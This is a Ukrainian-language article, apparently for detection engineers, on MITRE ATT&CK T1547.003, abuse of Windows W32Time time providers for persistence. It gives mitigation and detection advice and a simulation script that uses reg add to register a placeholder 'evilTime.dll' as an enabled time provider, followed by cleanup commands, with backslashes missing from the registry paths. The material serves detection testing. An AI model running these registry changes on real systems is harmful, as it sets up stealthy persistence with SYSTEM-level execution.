T1547.003 Постачальники часу в MITRE ATT&CK: Пояснено

Резюме

Стаття пояснює, як зловмисники можуть встановити стійкість на Windows, зловживаючи службою W32Time. Зареєструвавши шкідливу DLL як постачальника часу через зміну реєстру, завантажити шкідливий код автоматично щоразу, коли служба запускається. Цей метод ховає шкідливе виконання за легітимним компонентом Windows, допомагаючи зловмиснику злитися з нормальною поведінкою системи.

Дослідження

Звіт не зосереджується на певному зразку шкідливого ПЗ або кампанії втручання. Замість цього, в ньому розглядається технічний процес, який міг би використовувати зловмисник для зміни налаштувань реєстру служби W32Time та примусового завантаження підробленої DLL. Він також виділяє відповідний синтаксис команд і шлях реєстру, необхідний для реалізації зловживання.

Мітигація

Організації повинні використовувати групові політики для захисту файлів служби W32Time та пов’язаних ключів реєстру від несанкціонованих змін. Доступ для запису до реєстру слід обмежити довіреним адміністраторам, а захисники повинні відстежувати зміни до підключки TimeProviders. Перевірки цілісності файлів DLL W32Time та суворі контролі мінімальних привілеїв для облікового запису Local Service можуть ще більше знизити ризик.

Відповідь

Команди виявлення повинні відслідковувати створення або зміну підключок під шляхом реєстру W32TimeTimeProviders. Значення реєстру, що посилаються на незнайомі DLL, слід негайно досліджувати. Ці сигнали слід корелювати з активністю процесу, яка включає w32tm.exe, завантажуючи нестандартну DLL, разом з будь-якою пов’язаною поведінкою встановлення стійкості.

Виконання імітації

Передумова: перевірка телеметрії та базової лінії має бути пройдена.

• Сценарій атаки та команди:
  Противник з правами локального адміністратора хоче стійкості, яка виживає при перезавантаженні системи і важко виявляється. Вони обирають зловживання службою часу Windows (W32Time), реєструючи шкідливу DLL як постачальник часу. Ця техніка використовує законну утиліту reg.exe (життя за рахунок землі) для зміни ключа реєстру HKLMSystemCurrentControlSetServicesW32TimeTimeProviders<CustomProvider>. Після завантаження DLL під час завантаження служби зловмисник отримує виконання коду з привілеями SYSTEM.

• Скрипт регресійного тестування:

  # -------------------------------------------------
  #   Реєстрація шкідливої DLL як постачальник часу W32Time
  # -------------------------------------------------
  $providerName = "MaliciousTimeProvider"
  $dllPath      = "C:TempevilTime.dll"
  
  # 1. Створіть фіктивну шкідливу DLL для тесту
  New-Item -Path $dllPath -ItemType File -Force | Out-Null
  
  # 2. Додайте ключ реєстрації постачальника часу
  $regPath = "HKLMSystemCurrentControlSetServicesW32TimeTimeProviders$providerName"
  reg add "HKLMSystemCurrentControlSetServicesW32TimeTimeProviders$providerName" /v "Dll" /t REG_SZ /d $dllPath /f
  
  # 3. Увімкніть постачальника (значення Enabled = 1)
  reg add "HKLMSystemCurrentControlSetServicesW32TimeTimeProviders$providerName" /v "Enabled" /t REG_DWORD /d 1 /f
  
  Write-Host "Шкідливий постачальник часу зареєстровано. Перевірте SIEM для виявлення."

• Команди очистки:

  # -------------------------------------------------
  #   Видалення реєстрації шкідливого постачальника часу
  # -------------------------------------------------
  $providerName = "MaliciousTimeProvider"
  $regPath = "HKLMSystemCurrentControlSetServicesW32TimeTimeProviders$providerName"
  
  # Видалити ключ постачальника рекурсивно
  reg delete "HKLMSystemCurrentControlSetServicesW32TimeTimeProviders$providerName" /f
  
  # Видалити фіктивний файл DLL
  Remove-Item "C:TempevilTime.dll" -Force -ErrorAction SilentlyContinue
  
  Write-Host "Очищення завершено."